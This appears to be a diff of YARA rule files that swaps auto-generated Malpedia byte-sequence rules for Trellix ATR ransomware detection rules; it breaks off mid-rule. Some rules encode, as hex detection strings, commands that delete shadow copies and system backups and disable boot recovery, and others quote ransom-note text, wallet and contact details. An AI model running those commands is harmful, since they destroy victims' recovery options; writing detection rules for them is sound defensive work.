c644112800 85f6 740c 56 e8???????? } - $sequence_14 = { 8945fc ff15???????? 85c0 7460 c603e9 8b4704 2bc3 } - $sequence_15 = { 83feff 0f8432010000 57 6a01 83caff 8d4de8 } + $s1 = "C:\\Users\\Umut\\Desktop\\takemeon" fullword wide + $s2 = "C:\\Users\\Umut\\Desktop\\" fullword ascii + $s3 = "PRESS HERE TO STOP THIS CREEPY SOUND AND VIEW WHAT HAPPENED TO YOUR COMPUTER" fullword wide + $s4 = "WHAT YOU DO TO MY COMPUTER??!??!!!" fullword wide condition: - 7 of them and filesize <253952 + ( uint16(0)==0x5a4d and filesize <5000KB) and all of them } -rule MALPEDIA_Win_Luca_Stealer_Auto : FILE +rule TRELLIX_ARC_Cryptolocker_Set1 : RANSOMWARE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8a0c166d-37f3-5a13-bfc2-83fc09a4679d" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.luca_stealer_auto.yar#L1-L134" - license_url = "N/A" - logic_hash = "f2eabac635b7bb4e193cfff7279ec9fd429ac964f492c856eb49bfd67aa7534f" + description = "Detection of Cryptolocker Samples" + author = "Christiaan Beek, Christiaan_Beek@McAfee.com" + id = "13ccc6d3-c2cc-59ac-81af-ec11fb78cd41" + date = "2014-04-13" + modified = "2020-08-14" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Cryptolocker.yar#L1-L40" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "5be8d077537a59d860a972392be186d2697e55778f750d03b0fd3b0a73f714d9" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Cryptolocker" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { e8???????? 488bf8 81e7ffffff3f 498b4e60 488b5910 4885db 7452 } - $sequence_1 = { f645ef02 741d 807df101 7417 b201 488d4de7 e8???????? } - $sequence_2 = { eb06 4531c0 4889d0 48c7837802000002000000 44888380020000 c6838102000000 48898388020000 } - $sequence_3 = { e8???????? 498b0f 498b4708 4983670800 4885c0 740f 4883c420 } - $sequence_4 = { ff15???????? 894530 85c0 0f842b520000 488dbd501f0000 8b0f e8???????? } - $sequence_5 = { e8???????? 85c0 0f85be000000 488bcb e8???????? 488b8798090000 498bce } - $sequence_6 = { e8???????? 85c0 740c 488b0b 8a0439 2c3a 3c01 } - $sequence_7 = { e9???????? 488d3515b8d8ff eb03 4d03fd 410fb607 4484ac30009e4100 75ef } - $sequence_8 = { e9???????? b009 eb4f 488b842490000000 66c7000109 e9???????? 488db424e0000000 } - $sequence_9 = { eb86 e8???????? 0f0b 4157 4156 4155 4154 } + $string0 = "static" + $string1 = " kscdS" + $string2 = "Romantic" + $string3 = "CompanyName" wide + $string4 = "ProductVersion" wide + $string5 = "9%9R9f9q9" + $string6 = "IDR_VERSION1" wide + $string7 = " </trustInfo>" + $string8 = "LookFor" wide + $string9 = ":n;t;y;" + $string10 = " <requestedExecutionLevel level" + $string11 = "VS_VERSION_INFO" wide + $string12 = "2.0.1.0" wide + $string13 = "<assembly xmlns" + $string14 = " <trustInfo xmlns" + $string15 = "srtWd@@" + $string16 = "515]5z5" + $string17 = "C:\\lZbvnoVe.exe" wide condition: - 7 of them and filesize <9285632 + 12 of ($string*) } -rule MALPEDIA_Win_Bistromath_Auto : FILE +rule TRELLIX_ARC_Cryptolocker_Rule2 : RANSOMWARE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "62a1b548-25a5-5273-be8b-9848556649f4" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bistromath_auto.yar#L1-L134" - license_url = "N/A" - logic_hash = "b9314d0c2625ba0e21f5bfba175e042ed0e577dd2d934e440857096b6f3294e9" + description = "Detection of CryptoLocker Variants" + author = "Christiaan Beek, Christiaan_Beek@McAfee.com" + id = "a6e808ef-4f60-5592-9440-69309784efb1" + date = "2014-04-14" + modified = "2020-08-14" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Cryptolocker.yar#L42-L79" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "e8e03516cc0b669000c8d6b443be7a5f7a8b904abba98fd3c7d4f038de6741ab" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Cryptolocker" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { e8???????? 85c0 741d 0f57c0 0f1100 0f114010 660fd64020 } - $sequence_1 = { ff75f0 56 e8???????? 8b45f8 83c40c c6040600 8bce } - $sequence_2 = { eb24 8d5001 e8???????? 8bf0 85f6 7416 ff75fc } - $sequence_3 = { e8???????? 8b4580 46 3bf0 7ce8 33f6 85db } - $sequence_4 = { e8???????? 8b4c2410 8901 83c718 8b442424 83c104 894c2410 } - $sequence_5 = { 8b45e8 85c0 0f84bb250000 ff474c 8d535f 8b7f4c 8bce } - $sequence_6 = { e8???????? 8945e4 85c0 0f84e1010000 ff75f0 33d2 8bcb } - $sequence_7 = { ff75fc e8???????? 8bf0 83c404 85f6 7418 8d45fc } - $sequence_8 = { 8b4df8 e8???????? 8b5324 8b4df8 e8???????? 6a30 6a00 } - $sequence_9 = { 83c404 46 8d7efe 83fe02 7304 33d2 eb2e } + $string0 = "2.0.1.7" wide + $string1 = " <security>" + $string2 = "Romantic" + $string3 = "ProductVersion" wide + $string4 = "9%9R9f9q9" + $string5 = "IDR_VERSION1" wide + $string6 = "button" + $string7 = " </security>" + $string8 = "VFileInfo" wide + $string9 = "LookFor" wide + $string10 = " </requestedPrivileges>" + $string11 = " uiAccess" + $string12 = " <trustInfo xmlns" + $string13 = "last.inf" + $string14 = " manifestVersion" + $string15 = "FFFF04E3" wide + $string16 = "3,31363H3P3m3u3z3" condition: - 7 of them and filesize <33816576 + 12 of ($string*) } -rule MALPEDIA_Win_Leash_Auto : FILE +import "pe" + +rule TRELLIX_ARC_Ransom_Tunderx : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cb5c9738-3925-5a03-a07d-f456311bbe1c" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.leash_auto.yar#L1-L123" - license_url = "N/A" - logic_hash = "ba62c5a8d74be4d262e44012cbb9d0d01e64bb5749bfbb2b1403f379db7c0758" + description = "Rule to detect tthe ThunderX ransomware family" + author = "McAfee ATR team" + id = "cf5ecd0c-db26-5fe4-a056-b5c1ca3b1d34" + date = "2020-09-14" + modified = "2020-10-12" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_ThunderX.yar#L3-L45" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "f870616c4a35239a01129daad5f12469b2df39251ee4bc9fbeb5523f00231ece" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 68 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransomware:W32/ThunderX" + actor_type = "Cybercrime" + actor_group = "Unknown" + hash1 = "7bab5dedef124803668580a59b6bf3c53cc31150d19591567397bbc131b9ccb6" + hash2 = "0fbfdb8340108fafaca4c5ff4d3c9f9a2296efeb9ae89fcd9210e3d4c7239666" + hash3 = "7527459500109b3bb48665236c5c5cb2ec71ba789867ad2b6417b38b9a46615e" strings: - $sequence_0 = { e8???????? 83c408 85c0 7511 8b8b08080000 56 e8???????? } - $sequence_1 = { 8a45ef 885def 3ac3 7404 c645ef01 } - $sequence_2 = { 6a01 6a02 ff15???????? 83f8ff 89831c180000 7519 5f } - $sequence_3 = { 33c0 f2ae f7d1 49 51 e8???????? 8be8 } - $sequence_4 = { 2bf9 8d93fe030000 8bc1 8bf7 8bfa 52 } - $sequence_5 = { 8b5808 33c0 8a442413 33fb 33db } - $sequence_6 = { 8bc1 8bf7 8bfa 8d9510ffffff } - $sequence_7 = { 85ff c744242800000000 7e58 8bd8 895c2410 } - $sequence_8 = { 8bd1 8bf0 c1e902 f3a5 8bca 83c404 83e103 } - $sequence_9 = { 894518 8b4514 99 83e203 03c2 8b5518 } + $pattern1 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" + $s3 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii + $s4 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii + $s5 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii + $s6 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii + $s7 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii + $s8 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii + $s9 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii + $s10 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii + $s11 = "534F4654574152455C4D6963726F736F66745C45524944" ascii + $s12 = "AppPolicyGetProcessTerminationMethod" fullword ascii + $s13 = "7B5041545445524E5F49447D" ascii + $s14 = "726561646D652E747874" ascii + $s15 = "226E6574776F726B223A22" ascii + $s16 = "227375626964223A22" ascii + $s17 = "226C616E67223A22" ascii + $s18 = "22657874223A22" ascii + $s19 = "69642E6B6579" ascii + $s20 = "7B5549447D" ascii + $seq0 = { eb 34 66 0f 12 0d 10 c4 41 00 f2 0f 59 c1 ba cc } + $seq1 = { 6a 07 50 e8 51 ff ff ff 8d 86 d0 } + $seq2 = { ff 15 34 81 41 00 eb 15 83 f8 fc 75 10 8b 45 f4 } condition: - 7 of them and filesize <761856 + ( uint16(0)==0x5a4d and filesize <400KB and pe.imphash()=="ea7e408cd2a264fd13492973e97d8d70" and $pattern1 and 4 of them ) and all of ($seq*) or ( all of them ) } -rule MALPEDIA_Win_Darkrat_Auto : FILE +rule TRELLIX_ARC_RANSOM_Mountlocker : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "73555b6d-cd36-53aa-b241-54638d6391a7" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkrat_auto.yar#L1-L124" - license_url = "N/A" - logic_hash = "e98d828b961bffb4ad606aad50a055367532a60432b86ca76a8c360da1aac44b" + description = "Rule to detect Mount Locker ransomware" + author = "McAfee ATR Team" + id = "8451b78c-3cef-557a-a2e3-0767a0b0eddb" + date = "2020-09-25" + modified = "2020-10-12" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_mountlocker.yar#L1-L32" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "fb332a6725b9276cca379dd3621943c69f88570fb317da27a857a2544d2aa4e0" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 64 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransomware:W32/MountLocker" + actor_type = "Cybercrime" + actor_group = "Unknown" + hash1 = "4b917b60f4df6d6d08e895d179a22dcb7c38c6a6a6f39c96c3ded10368d86273" + hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963" strings: - $sequence_0 = { 837de810 895510 8b4804 8d45d4 0f4345d4 2975b4 } - $sequence_1 = { 51 03f8 52 57 e8???????? 8b45c8 83c40c } - $sequence_2 = { 51 56 e8???????? 83c40c c6043e00 eb17 57 } - $sequence_3 = { 8b7dd4 0f8514ffffff 8b55ec 83fa10 } - $sequence_4 = { 8bd0 b805000000 2bd6 8a0e 8d7601 884c32ff 83e801 } - $sequence_5 = { e8???????? 83c408 c745e800000000 8d4dd8 } - $sequence_6 = { 0b510c 52 e8???????? c745fc04000000 e8???????? 84c0 7507 } - $sequence_7 = { 83c408 c745e800000000 8d4dd8 c745ec0f000000 c645d800 } - $sequence_8 = { ff75d0 51 8bcb e8???????? 8b75b8 c645fc01 } - $sequence_9 = { 895510 8b4804 8d45d4 0f4345d4 2975b4 03c6 ff75b4 } + $s1 = {63 69 64 3d 25 43 4c 49 45 4e 54 5f 49 44} + $s2 = {7a 73 61 33 77 78 76 62 62 37 67 76 36 35 77 6e 6c 37 6c 65 72 73 6c 65 65 33 63 37 69 32 37 6e 64 71 67 68 71 6d 36 6a 74 32 70 72 69 76 61 32 71 63 64 70 6f 6e 61 64 2e 6f 6e 69 6f 6e} + $s3 = {36 6d 6c 7a 61 68 6b 63 37 76 65 6a 79 74 70 70 62 71 68 71 6a 6f 75 34 69 70 66 74 67 73 33 67 69 7a 6f 66 32 78 34 7a 6b 6c 62 6c 6c 69 61 79 68 73 71 62 33 77 61 64 2e 6f 6e 69 6f 6e} condition: - 7 of them and filesize <884736 + uint16(0)==0x5a4d and filesize <300KB and ($s1 and $s2) or ($s1 and $s3) or $s1 } -rule MALPEDIA_Win_Poortry_Auto : FILE +import "pe" + +rule TRELLIX_ARC_Ransom_Vovalex_Part2 : RANSOM FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2cf345f6-6c65-548f-9e1e-6a67040df1b7" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poortry" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poortry_auto.yar#L1-L133" - license_url = "N/A" - logic_hash = "3ea6c4ba39d0058f0069c86346c9de0810387b212bcc1f7c57e5a516c20ae9ad" + description = "Vovalex ransomware detection part 2" + author = "CB @ ATR" + id = "26c91d06-13da-5039-8b8a-eb8de2774d79" + date = "2021-02-01" + modified = "2021-02-01" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Vovalex1.yar#L3-L42" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "82814fd9155ec910c6353de8336733704e05c9f02409ad99cd80da8ef9fe3c04" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 64 + tags = "RANSOM, FILE" + malware_type = "Ransom" + malware_family = "Ransom:Win/Vovalex" + hash1 = "0604acc15196120db2f4ca922feb2a4c858a46123cb26e9af2ef97b4c7839121" + hash2 = "fe9ff27ec0a1a48cbb8bc043f260a656c221c6c61704187a390bc8da6f91103a" + hash3 = "3b198c367aca1d239abc48bdeb8caabf9b8f2b630071b8e0fd1e86940eab14d6" strings: - $sequence_0 = { 41f7d2 f9 4181f80255e860 4181f225619d1f 41f7da f8 4181c2174c0279 } - $sequence_1 = { 66f7c4e120 310424 5e 41f6c105 443af4 4863c0 f5 } - $sequence_2 = { 66443bf0 56 0fbae697 c1e61f 311424 f9 660fbafec8 } - $sequence_3 = { 41f7d3 4151 450aca 6641d3e1 44311c24 4180d1a2 } - $sequence_4 = { f8 81f79e0d521c f8 d1cf 81c71d19891d f8 f5 } - $sequence_5 = { 4151 41c0e937 4d0fb7c9 313424 450fc0c9 66450fabf1 66410fbae1d7 } - $sequence_6 = { 4484c7 81c33f50eb3f 664181f8ec0e f7db 4153 311c24 6641c1c318 } - $sequence_7 = { 56 401af3 40d2e6 66f7c4e120 310424 5e 41f6c105 } - $sequence_8 = { 4123ea 48c1d5cd 5d f9 4d63c9 4881f98925786f 664185d3 } - $sequence_9 = { f6dd 4159 4084ee 40b5c4 9d 66400fbecd 59 } + $x1 = "If you don't know where to buy Monero - visit these websites: https://www.bestchange.ru/ https://www.bestchange.com" fullword ascii + $s2 = "Full list: https://www.getmonero.org/community/merchants/#exchanges" fullword ascii + $s3 = ": https://www.getmonero.org/community/merchants/#exchanges" fullword ascii + $s4 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\file.d" fullword ascii + $s5 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\utf.d" fullword ascii + $s6 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\stdio.d" fullword ascii + $s7 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\format.d" fullword ascii + $s8 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\random.d" fullword ascii + $s9 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\conv.d" fullword ascii + $s10 = "3. If everything is good, you will receive the decryptor." fullword ascii + $s11 = "Attempting to flush() in an unopened file" fullword ascii + $s12 = "Monero: 4B45W7V1sJAZBnPSnvcipa5k7BRyC4w8GCTfQCUL2XRx5CFzG3iJtEk2kqEvFbF7FagEafRYFfQ6FJnZmep5TsnrSfxpMkS" fullword ascii + $s13 = "..\\AppData\\Local\\dub\\packages\\crypto-0.2.16\\crypto\\src\\crypto\\padding.d" fullword ascii + $s14 = "crypto.aes.AES!(4u, 8u, 14u).AES" fullword ascii + $s15 = "..\\AppData\\Local\\dub\\packages\\crypto-0.2.16\\crypto\\src\\crypto\\aes.d" fullword ascii + $s16 = "Monero - " fullword ascii + $s17 = "std.random.uniform(): invalid bounding interval " fullword ascii + $s18 = "crypto.aes.AESUtils" fullword ascii + $s19 = "2. Send us a mail with proofs of transaction: VovanAndLexus@cock.li" fullword ascii + $s20 = "crypto.aes" fullword ascii + $op0 = { 48 8d 8d 10 ff ff ff e8 4a 22 fe ff f7 df 89 bd } + $op1 = { e8 60 6e fb ff 34 01 75 d6 4c 8b 46 40 48 8b 56 } + $op2 = { 4c 8d 85 40 ff ff ff 4c 8d 15 d2 78 02 00 4c 89 } condition: - 7 of them and filesize <8078336 + ( uint16(0)==0x5a4d and filesize <17000KB and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) } -rule MALPEDIA_Win_Pinchduke_Auto : FILE +rule TRELLIX_ARC_RANSOM_Wastedlocker : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cba434ff-ad3f-569d-a5ea-a8661b7af309" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pinchduke_auto.yar#L1-L131" - license_url = "N/A" - logic_hash = "91b75415e43b3618cf4d35265fc79e44823a3f174f6cf370c8d280ecd6905acb" + description = "Rule to detect unpacked samples of WastedLocker" + author = "McAfee ATR Team" + id = "900923cf-75c0-5342-858d-fe1ffa9486bd" + date = "2020-07-27" + modified = "2020-10-12" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_wastedlocker.yar#L1-L32" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "c5adf88a46c34c8683d0e3d70529b352c77209f004e6c638ff079ea025921781" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/WastedLocker" + actor_type = "Cybercrime" + actor_group = "Unknown" + hash1 = "ae255679f487e2e9075ffd5e8c7836dd425229c1e3bd40cfc46fbbceceec7cf4" strings: - $sequence_0 = { 6a01 895dd4 895dd8 895ddc c645e030 895de1 } - $sequence_1 = { 9b d93c24 9b 58 50 80e4f3 80cc08 } - $sequence_2 = { 85d2 7416 8d4c50fe 2bf0 57 668b3c0e 668939 } - $sequence_3 = { 83c40c 8d857bffffff 50 8d4dc4 e8???????? 8d8d7bffffff e8???????? } - $sequence_4 = { 50 ff15???????? 3bc3 89456c 0f84cc020000 } - $sequence_5 = { 8945fc e8???????? 83c410 ff75fc 56 ff15???????? 56 } - $sequence_6 = { 64a118000000 3e8b4030 3e0fb64002 890424 8b0424 59 c3 } - $sequence_7 = { 6a00 ff7510 ff75fc ffd6 85c0 7404 33c0 } - $sequence_8 = { 85d2 75f5 8bc7 5f 5e c3 8b4c240c } - $sequence_9 = { e8???????? 8d85e4f7ffff 50 e8???????? 83ec0c 8bcc 50 } + $pattern_0 = { 8d45fc 50 53 53 6a19 ff75f8 } + $pattern_1 = { 66833b00 8bf3 0f8485000000 8b7d10 8b472c 85c0 7410 } + $pattern_2 = { e8???????? 8b4d08 8b4518 8d0441 6683600200 83c40c 837d1400 } + $pattern_3 = { 8701 e9???????? 8bc7 5f 5e 5b } + $pattern_4 = { 8bf8 3bfb 742f 53 8d45fc 50 56 } + $pattern_5 = { 6a10 8d45f0 6a00 50 e8???????? 83c40c 5e } + $pattern_6 = { 5f 5d c20800 55 8bec } + $pattern_7 = { 8d7e04 ff15???????? 85c0 8945e8 740e 2b4510 } + $pattern_8 = { ff15???????? 8b45dc 8b4dbc 69c00d661900 055ff36e3c 8945dc } + $pattern_9 = { 8b4d08 8b19 03d8 f7d0 c1c60f 03f2 0bc6 } condition: - 7 of them and filesize <223680 + 7 of them and filesize <1806288 } -rule MALPEDIA_Win_Btcware_Auto : FILE +rule TRELLIX_ARC_Screenlocker_Acroware : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "66d799b0-12ae-5de4-8213-c0d10e51387d" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.btcware_auto.yar#L1-L125" - license_url = "N/A" - logic_hash = "150a811146243acd5ee4c0630508ee4be9bafcd2cf3745d9f46eb9848c5a7f93" + description = "Rule to detect the ScreenLocker Acroware" + author = "Marc Rivero | McAfee ATR Team" + id = "76eb69eb-dfe7-5629-bf2d-d20574efd662" + date = "2018-08-28" + modified = "2020-08-14" + reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_acroware.yar#L1-L29" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "f9efcfc5328e6502cbbbff752a940ac221e437d8732052fc265618f6a6ad72ae" + logic_hash = "582f3544cf1f8066b1e9ac04c3a4cc9f0ba96804ca53bc3746b433df9c33e0a1" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Acroware" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { 53 ff15???????? 8b4524 83f810 7242 8b4d10 } - $sequence_1 = { c7404818c14100 8b4508 6689486c 8b4508 66898872010000 8d4dff 8b4508 } - $sequence_2 = { 33c5 8945fc 8b450c 56 8b7508 680a010000 } - $sequence_3 = { 33c0 85ff 7e18 0fb78c4490020000 663bce 7406 66894c5440 } - $sequence_4 = { 50 8d44241c 50 ff74241c ff15???????? 85c0 7446 } - $sequence_5 = { 33db 895610 c746140f000000 8975d4 8955e4 } - $sequence_6 = { 8d85f8efffff 50 ffd7 85c0 0f84ac000000 8d85f4efffff } - $sequence_7 = { 85c0 0f84ac000000 8d85f4efffff 50 } - $sequence_8 = { 6800010000 8d85fcfcffff 50 68???????? ff15???????? 8b35???????? } - $sequence_9 = { 8d85e0efffff 50 6a00 6800800000 ffb5f0efffff 8d85fcefffff 50 } + $s1 = "C:\\Users\\patri\\Documents\\Visual Studio 2015\\Projects\\Advanced Ransi\\Advanced Ransi\\obj\\Debug\\Advanced Ransi.pdb" fullword ascii + $s2 = "All your Personal Data got encrypted and the decryption key is stored on a hidden" fullword ascii + $s3 = "alphaoil@mail2tor.com any try of removing this Ransomware will result in an instantly " fullword ascii + $s4 = "HKEY_CURRENT_USER\\SoftwareE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide + $s5 = "webserver, after 72 hours thedecryption key will get removed and your personal" fullword ascii condition: - 7 of them and filesize <458752 + ( uint16(0)==0x5a4d and filesize <2000KB) and all of them } -rule MALPEDIA_Win_Pwnpos_Auto : FILE +import "pe" +import "hash" + +rule TRELLIX_ARC_Ransom_Egregor : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "abbe2d0a-a645-5f32-9b7c-0253f67ad1b4" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pwnpos_auto.yar#L1-L125" - license_url = "N/A" - logic_hash = "7bd328aa33dd14635d4dbb434ca27c66253964455bceaea97af6eb90a2de7f21" + description = "Detect Egregor ransomware" + author = "Thomas Roccia | McAfee ATR team" + id = "b9f1a712-c168-5e0f-8b9e-cb03a6c43fc3" + date = "2020-10-28" + modified = "2020-10-28" + reference = "https://bazaar.abuse.ch/sample/004a2dc3ec7b98fa7fe6ae9c23a8b051ec30bcfcd2bc387c440c07ff5180fe9a/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_egregor.yar#L4-L31" + license_url = 